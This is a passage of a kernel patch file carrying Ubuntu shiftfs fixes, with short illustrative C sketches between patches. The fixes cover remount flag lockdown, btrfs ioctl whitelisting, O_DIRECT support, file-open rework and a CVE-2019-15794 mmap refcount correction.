+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_dir_llseek,
+ 	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+ 	.release		= shiftfs_release,
+-- 
+2.39.2
+
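+A quick userspace check of the behaviour this fixes (the path is
+hypothetical; assumes a shiftfs mount at /mnt/shiftfs):
+
+ #include <fcntl.h>
+ #include <stdio.h>
+ #include <unistd.h>
+
+ int main(void)
+ {
+   int fd = open("/mnt/shiftfs", O_RDONLY | O_DIRECTORY);
+
+   if (fd < 0)
+     return 1;
+   /* With the fix this seeks the underlying realfile's f_pos, so a
+    * later getdents() resumes from the right directory offset. */
+   printf("end offset: %lld\n", (long long)lseek(fd, 0, SEEK_END));
+   close(fd);
+   return 0;
+ }
+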
+From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Wed, 8 May 2019 14:13:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1827122
+
+This locks down various superblock flags to prevent userns-root from
+remounting a superblock with less restrictive options than the original
+mark or underlay mount.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 46 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9771165d1ce0..a1dae7ea593b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
+ 	return true;
+ }
+ 
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
+ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ {
+ 	int err;
+@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (err)
+ 		return err;
+ 
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
+ 	/* Mark mount option cannot be changed. */
+ 	if (info->mark || (info->mark != new.mark))
+ 		return -EPERM;
+@@ -1847,6 +1878,16 @@ struct shiftfs_data {
+ 	const char *path;
+ };
+ 
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
+ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			      int silent)
+ {
+@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	sb->s_flags |= SB_POSIXACL;
++
+ 	if (sbinfo->mark) {
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+ 
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
+ 		/*
+ 		 * Handle nesting of shiftfs mounts by referring this mark
+ 		 * mount back to the original mark mount. This is more
+@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 * passthrough settings.
+ 		 */
+ 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_flags |= SB_POSIXACL;
+ 	sb->s_root = d_make_root(inode);
+ 	if (!sb->s_root) {
+ 		err = -ENOMEM;
+-- 
+2.39.2
+
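+The same one-way rule, compacted into a mask for illustration (the
+patch spells the checks out flag by flag):
+
+ #include <linux/fs.h>
+
+ /*
+  * Restrictions may only ever be added relative to the original mount;
+  * SB_POSIXACL is the inverse and may only ever be dropped.
+  */
+ static int check_locked_down_flags(unsigned long old_flags,
+                                    unsigned long new_flags)
+ {
+   const unsigned long restr = SB_RDONLY | SB_NOSUID | SB_NODEV |
+                               SB_NOEXEC | SB_NOATIME | SB_NODIRATIME;
+
+   if (old_flags & restr & ~new_flags) /* tried to drop a restriction */
+     return -EPERM;
+   if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
+     return -EPERM;
+   return 0;
+ }
+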
+From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 11 Jun 2019 11:47:35 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1832316
+
+This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
+
+Currently, btrfs workloads employing shiftfs hit a regression.
+With btrfs unprivileged users can already toggle whether a subvolume
+will be ro or rw. This is broken on current shiftfs as we haven't
+whitelisted these ioctl()s.
+To prevent such regression, we need to whitelist the ioctls
+BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
+BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
+users.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Cc: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 21 ++++++++++++++++++---
+ 1 file changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a1dae7ea593b..49f6714e9f95 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	return ret;
+ }
+ 
+-static bool in_ioctl_whitelist(int flag)
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ {
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
+ 	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
+ 	case BTRFS_IOC_SNAP_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SNAP_CREATE_V2:
+@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
+ 	case BTRFS_IOC_SUBVOL_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, arg, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
+ 		return true;
+ 	case BTRFS_IOC_SNAP_DESTROY:
+ 		return true;
+@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOTTY;
+ 	}
+@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOIOCTLCMD;
+ 	}
+-- 
+2.39.2
+
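+What this enables from userspace, sketched as a helper (assumes fd
+refers to a subvolume visible through shiftfs):
+
+ #include <sys/ioctl.h>
+ #include <linux/btrfs.h>
+
+ /* Toggle only the read-only bit; any other flag is rejected by the
+  * whitelist check in the patch above. */
+ static int set_subvol_ro(int fd, int ro)
+ {
+   __u64 flags;
+
+   if (ioctl(fd, BTRFS_IOC_SUBVOL_GETFLAGS, &flags) < 0)
+     return -1;
+   if (ro)
+     flags |= BTRFS_SUBVOL_RDONLY;
+   else
+     flags &= ~BTRFS_SUBVOL_RDONLY;
+   return ioctl(fd, BTRFS_IOC_SUBVOL_SETFLAGS, &flags);
+ }
+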
+From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:46 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837223
+
+This enables O_DIRECT support for shiftfs if the underlay supports it.
+
+Currently shiftfs does not handle O_DIRECT even if the underlay supports it.
+This is blocking dqlite - an essential part of LXD - from profiting from
+the performance benefits of O_DIRECT on suitable filesystems when used
+with async io such as aio or io_uring.
+Overlayfs cannot support this directly since the upper filesystem in
+overlay can be any filesystem. So if the upper filesystem does not
+support O_DIRECT but the lower filesystem does, you're out of luck.
+Shiftfs does not suffer from the same problem since there is no concept
+of an upper filesystem in the same way that overlayfs has it.
+Essentially, shiftfs is a transparent shim relaying everything to the
+underlay while overlayfs' upper layer is not (completely).
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 49f6714e9f95..addaa6e21e57 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	file->private_data = file_info;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
+ 	file_info->realfile = realfile;
+ 	return 0;
+ }
+-- 
+2.39.2
+
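+A minimal userspace exercise of the new capability (the path is
+hypothetical; O_DIRECT requires aligned buffers and offsets):
+
+ #define _GNU_SOURCE
+ #include <fcntl.h>
+ #include <stdlib.h>
+ #include <string.h>
+ #include <unistd.h>
+
+ int main(void)
+ {
+   void *buf;
+   int fd = open("/mnt/shiftfs/log", O_WRONLY | O_CREAT | O_DIRECT, 0600);
+
+   if (fd < 0 || posix_memalign(&buf, 4096, 4096))
+     return 1;
+   memset(buf, 0, 4096);
+   /* dentry_open() accepts O_DIRECT only if f_mapping->a_ops->direct_IO
+    * is set, which the fix borrows from the underlay's realfile. */
+   return pwrite(fd, buf, 4096, 0) == 4096 ? 0 : 1;
+ }
+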
+From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:47 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837231
+
+This used to pass an unsigned long to copy_from_user() instead of a
+void __user * pointer. This will produce a warning with a sufficiently
+advanced compiler.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index addaa6e21e57..9006201c243d 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ 	case BTRFS_IOC_SUBVOL_GETFLAGS:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_SETFLAGS:
+-		if (copy_from_user(&flags, arg, sizeof(flags)))
++		if (copy_from_user(&flags, argp, sizeof(flags)))
+ 			return false;
+ 
+ 		if (flags & ~BTRFS_SUBVOL_RDONLY)
+-- 
+2.39.2
+
+From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Thu, 29 Aug 2019 20:45:07 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1841977
+
+The way we messed with setting i_nlink was brittle and wrong. We used to
+set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
+of the underlay dentry of the directory it resided in which makes no
+sense whatsoever. We also missed drop_nlink() which is crucial since
+i_nlink affects whether a dentry is cleaned up on dput().
+With this I cannot reproduce the bug anymore where shiftfs misleads zfs
+into believing that a deleted file cannot be removed from disk because
+it is still referenced.
+
+Fixes: commit 87011da41961 ("shiftfs: rework and extend")
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 ++++++++++-----
+ 1 file changed, 10 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9006201c243d..e80db9480b5c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 		err = vfs_rmdir(loweri, lowerd);
+ 	else
+ 		err = vfs_unlink(loweri, lowerd, NULL);
+-	inode_unlock(loweri);
+ 	revert_creds(oldcred);
+ 
+-	shiftfs_copyattr(loweri, dir);
+-	set_nlink(d_inode(dentry), loweri->i_nlink);
+-	if (!err)
++	if (!err) {
+ 		d_drop(dentry);
+ 
+-	set_nlink(dir, loweri->i_nlink);
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
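+The nlink rule the fix settles on, isolated as a sketch mirroring the
+hunk above:
+
+ #include <linux/fs.h>
+
+ /*
+  * rmdir removes the last link to the directory, so zero i_nlink;
+  * unlink removes one link. drop_nlink() also warns on underflow,
+  * which the old set_nlink()-based code could never do.
+  */
+ static void account_removal(struct inode *inode, bool rmdir)
+ {
+   if (rmdir)
+     clear_nlink(inode);
+   else
+     drop_nlink(inode);
+ }
+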
+From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 30 Aug 2019 14:14:31 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
+ SLAB_RECLAIM_ACCOUNT
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1842059
+
+Shiftfs does not mark its slab cache as reclaimable. While this is not
+a big deal it is not nice to the kernel in general. The shiftfs cache is
+not so important that it can't be reclaimed.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e80db9480b5c..a21cb473e000 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
+ {
+ 	shiftfs_file_info_cache = kmem_cache_create(
+ 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+ 	if (!shiftfs_file_info_cache)
+ 		return -ENOMEM;
+ 
+-- 
+2.39.2
+
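+For comparison, a generic cache created with the same flags (name and
+object size here are illustrative):
+
+ #include <linux/slab.h>
+
+ /* SLAB_RECLAIM_ACCOUNT tells the VM the objects are reclaimable;
+  * SLAB_ACCOUNT charges them to the allocating memory cgroup. */
+ static struct kmem_cache *example_cache_create(void)
+ {
+   return kmem_cache_create("example_cache", 64, 0,
+                            SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN |
+                            SLAB_ACCOUNT, NULL);
+ }
+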
+From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 2 Oct 2019 09:57:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1846265
+
+This commit simplifies how shiftfs opens files, both regular files and
+directories.
+
+In the first iteration, we implemented a kmem cache for struct
+shiftfs_file_info which stashed away a struct path and the struct file
+for the underlay. The path however was never used anywhere so the struct
+shiftfs_file_info and therefore the whole kmem cache can go away.
+Instead we move to the same model as overlayfs and just stash away the
+struct file for the underlay in file->private_data of the shiftfs struct
+file.
+Additionally, we split the .open method for files and directories.
+Similar to overlayfs, .open for regular files uses open_with_fake_path(),
+which ensures that it doesn't contribute to the open file count (since
+this would mean we'd count double). The .open method for directories
+however uses dentry_open(), which contributes to the open file count.
+
+The basic logic for opening files is unchanged. The main point is to
+ensure that a reference to the underlay's dentry is kept through struct
+path.
+
+Various bits and pieces of this were cooked up in discussions Seth and I
+had in Paris.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
+ 1 file changed, 47 insertions(+), 58 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21cb473e000..55bb32b611f2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -31,13 +31,6 @@ struct shiftfs_super_info {
+ 	unsigned int passthrough_mark;
+ };
+ 
+-struct shiftfs_file_info {
+-	struct path realpath;
+-	struct file *realfile;
+-};
+-
+-struct kmem_cache *shiftfs_file_info_cache;
+-
+ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 			       umode_t mode, dev_t dev, struct dentry *dentry);
+ 
+@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
+ };
+ 
+ static struct file *shiftfs_open_realfile(const struct file *file,
+-					  struct path *realpath)
++					  struct inode *realinode)
+ {
+-	struct file *lowerf;
+-	const struct cred *oldcred;
++	struct file *realfile;
++	const struct cred *old_cred;
+ 	struct inode *inode = file_inode(file);
+-	struct inode *loweri = realpath->dentry->d_inode;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
+ 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
+ 
+-	oldcred = shiftfs_override_creds(inode->i_sb);
+-	/* XXX: open_with_fake_path() not gauranteed to stay around, if
+-	 * removed use dentry_open() */
+-	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
+-	revert_creds(oldcred);
++	old_cred = shiftfs_override_creds(inode->i_sb);
++	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
++				       info->creator_cred);
++	revert_creds(old_cred);
+ 
+-	return lowerf;
++	return realfile;
+ }
+ 
+ #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
+@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	lowerfd->flags = 0;
+ 	lowerfd->file = realfile;
+@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ 
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
+-	struct shiftfs_file_info *file_info;
+ 	struct file *realfile;
+-	struct path *realpath;
+ 
+-	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
+-	if (!file_info)
+-		return -ENOMEM;
+-
+-	realpath = &file_info->realpath;
+-	realpath->mnt = ssi->mnt;
+-	realpath->dentry = file->f_path.dentry->d_fsdata;
+-
+-	realfile = shiftfs_open_realfile(file, realpath);
+-	if (IS_ERR(realfile)) {
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	realfile = shiftfs_open_realfile(file, inode->i_private);
++	if (IS_ERR(realfile))
+ 		return PTR_ERR(realfile);
+-	}
+ 
+-	file->private_data = file_info;
++	file->private_data = realfile;
+ 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
+ 	file->f_mapping = realfile->f_mapping;
+ 
+-	file_info->realfile = realfile;
+ 	return 0;
+ }
+ 
+-static int shiftfs_release(struct inode *inode, struct file *file)
++static int shiftfs_dir_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile;
++	const struct cred *oldcred;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
++			       info->creator_cred);
++	revert_creds(oldcred);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
+ 
+-	if (file_info) {
+-		if (file_info->realfile)
+-			fput(file_info->realfile);
++	file->private_data = realfile;
+ 
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
+-	}
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct file *realfile = file->private_data;
++
++	if (realfile)
++		fput(realfile);
+ 
+ 	return 0;
+ }
+ 
++static int shiftfs_dir_release(struct inode *inode, struct file *file)
++{
++	return shiftfs_release(inode, file);
++}
++
+ static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	return vfs_llseek(realfile, offset, whence);
+ }
+@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
+ 
+ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 	const struct cred *oldcred;
+ 	int ret;
+ 
+@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ {
+ 	const struct cred *oldcred;
+ 	int err = -ENOTDIR;
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
+ 	err = iterate_dir(realfile, ctx);
+@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
++	.open			= shiftfs_dir_open,
++	.release		= shiftfs_dir_release,
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+ 	.llseek			= shiftfs_dir_llseek,
+-	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+-	.release		= shiftfs_release,
+ 	.unlocked_ioctl		= shiftfs_ioctl,
+ };
+ 
+@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
+-	shiftfs_file_info_cache = kmem_cache_create(
+-		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+-	if (!shiftfs_file_info_cache)
+-		return -ENOMEM;
+-
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
+-	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+-- 
+2.39.2
+
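+The resulting delegation pattern in one place (a sketch of the
+overlayfs-style model the commit adopts, not the shiftfs code itself):
+
+ #include <linux/file.h>
+ #include <linux/fs.h>
+
+ /*
+  * The underlay file lives in ->private_data. Regular files open it
+  * via open_with_fake_path() (no extra open-file accounting, which
+  * would double-count); directories via dentry_open(), which counts.
+  * Release is the same for both:
+  */
+ static int stacked_release(struct inode *inode, struct file *file)
+ {
+   struct file *realfile = file->private_data;
+
+   if (realfile)
+     fput(realfile);
+   return 0;
+ }
+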
+From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Wed, 6 Nov 2019 09:38:57 -0600
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
+ mmap fails
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850994
+
+shiftfs_mmap() overwrites vma->vm_file before calling the lower
+filesystem mmap but does not restore the original value on
+failure. This means it is giving a pointer to the lower fs file
+back to the caller with no reference, which is a bad practice.
+However, it does not lead to any issues with upstream kernels as
+no caller accesses vma->vm_file after call_mmap().
+
+With the aufs patches applied the story is different. Whereas
+mmap_region() previously fput a local variable containing the
+file it assigned to vm_file, it now calls vma_fput() which will
+fput vm_file, for which it has no reference, and the reference
+for the original vm_file is not put.
+
+Fix this by restoring vma->vm_file to the original value when the
+mmap call into the lower fs fails.
+
+CVE-2019-15794
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 +++++++++++----
+ 1 file changed, 11 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 55bb32b611f2..57d84479026b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	shiftfs_file_accessed(file);
+ 
+-	if (ret)
+-		fput(realfile); /* Drop refcount from new vm_file value */
+-	else
+-		fput(file); /* Drop refcount from previous vm_file value */
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
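+The corrected reference discipline for a stacked mmap, condensed (a
+sketch of the pattern the fix establishes):
+
+ #include <linux/fs.h>
+ #include <linux/mm.h>
+
+ static int stacked_mmap(struct file *file, struct vm_area_struct *vma)
+ {
+   struct file *realfile = file->private_data;
+   int ret;
+
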